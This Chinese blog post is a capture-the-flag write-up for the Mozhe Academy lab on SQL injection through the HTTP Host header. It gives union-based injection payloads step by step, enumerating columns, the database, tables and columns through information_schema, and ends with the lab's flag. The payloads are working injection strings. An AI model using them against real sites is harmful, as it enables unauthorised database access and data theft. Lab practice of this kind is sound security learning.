SQL注入之HTTP头注入–【SQL注入专题】

  • A+
所属分类:sql注入 web安全
[qgg_pink]之前突然对web安全有了有兴趣,想深入的学习下web安全相关的知识,所以在网上找了一个在线靶场(墨者学院)当练练手了,结果做着做着就停不下来了,积分一下子就刷到了第一,总共130几个靶场环境都基本上做完了,这里也把每个题的所涉及到的知识点分享出来。[/qgg_pink]

背景介绍

安全工程师"墨者"最近在练习MySQL头部注入漏洞,自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。

实训目标

  • 掌握SQL注入原理;
  • 了解手工注入的方法
  • 了解MySQL的数据结构;
  • 了解HTTP头部注入;

解题方向

HTTP头部(HOST注入)

解题思路

既然是host注入,首先抓包判断字段数:

1、判断字段数,http头host处输入:order by 4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】
页面返回正常,输入order by 5,页面返回错误,说明字段数为4

SQL注入之HTTP头注入–【SQL注入专题】

2、判断显示位置

union select 1,2,3,4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】

显示位置为2,3,4

3、判断当前数据库

union select 1,database(),3,4

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】当前数据库为pentesterlab

 

4、判断表

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='pentesterlab'  

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】得到表:comment,flag,goods,user

5、字段值

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='flag'   

SQL注入之HTTP头注入–【SQL注入专题】
SQL注入之HTTP头注入–【SQL注入专题】
最后得到flag为:mozhe47f283

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: